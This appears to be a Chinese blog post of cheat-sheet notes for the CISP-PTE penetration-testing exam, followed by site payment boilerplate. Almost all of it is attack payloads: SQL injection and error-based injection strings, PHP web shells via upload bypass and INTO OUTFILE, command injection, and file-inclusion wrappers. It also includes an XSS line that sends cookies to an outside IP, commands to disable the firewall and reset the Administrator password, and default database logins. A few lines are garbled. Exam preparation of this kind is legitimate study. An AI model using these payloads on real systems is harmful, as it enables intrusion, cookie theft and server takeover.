pte考前笔记

sql注入

手工注入
万能密码
admin’ or ‘1’ =‘1
注释
admin’ or 1=1 #

查表 select database()
select group_concat(table_name) from information_schema.tables where table_schema=‘’ #
过滤了 – #
用 ;%00

insert into(1,2,3,4,5) values ( 1,2,3,4,5 )
注意二次注入 巧用#
并且在查询数据时

读取文件时 load_file(‘’)

报错注入
updatexml(1,concat(0x7e,(select database()),0x7e),1)

insert into查询时报错 我们用
(select group_concat(username) from (select * from users1 limit 0,1)as a)

文件上传

文件后缀绕过 大小写绕过
Php php3 php5 pht phtml
内容绕过 用
< script language=‘php’>@eval($_POST[cmd]);< /script>
文件头绕过 用
GIF89a GIF87a

代码审计

构造闭合
a=");system("ls
定位符
ls >1.txt
反序列化

<?php $TEMP = "Whatever is worth doing is worth doing well."; echo serialize($TEMP) ?>

TEMP="CISP";serialize(TEMP="CISP"; serialize(TEMP="CISP";serialize(TEMP);
echo $TEMP;

cd[]=1
w={“bar1”:“2021a”,“bar2”:“[[1],1,2,3,4]”,“bar3”:“[cisp-pte,2]”}

xss

nc -lvvp 1145
python -m http.server 1145
python2 -m SimpleHttpServer 1145

<script>document.write('<img src="http://192.168.89.1:4444?' + document.cookie +'"/>');</script>

文件包含

记住伪协议
php://filter/read=convert.base64-encode/resouce=…key.flag

data://text.plain,<?php system('cat /flag.php')?>

data://text.plain;base64, <?php @eval($_POST['cmd']);?>

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

命令执行

tac
sed ‘’ …/key
ca\t …/key
ca"t …/key
more
过滤了key 或者php 用* 去匹配

连接符号
&& || ;过滤了空格 用< 重定向

业务逻辑
xff头
client-ip
更改请求头 TRACE找到源ip

日志审计

^.*
^开始匹配
. 匹配什么

  • 出现一次或多次
    ^.172.16.12.1. “[A-Z]+ /..(php|jsp|asp).” 200
    ^.* “[A-Z]+ /(?!/?(index|manage|footer|upload))..(php|jsp|asp).” 200

实操题

phpmyadmin
root/root
root/123456

select ‘<?php @eval($_POST['cmd']);?>’ into outfile ‘C:/phpstudy_pro/WWW/shell.php’

加密方式

md5
md5(md5)
sha-1

3306

netsh firewall set opmode disable
netsh firewall set opmode disable

net user Administrator Admin123

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值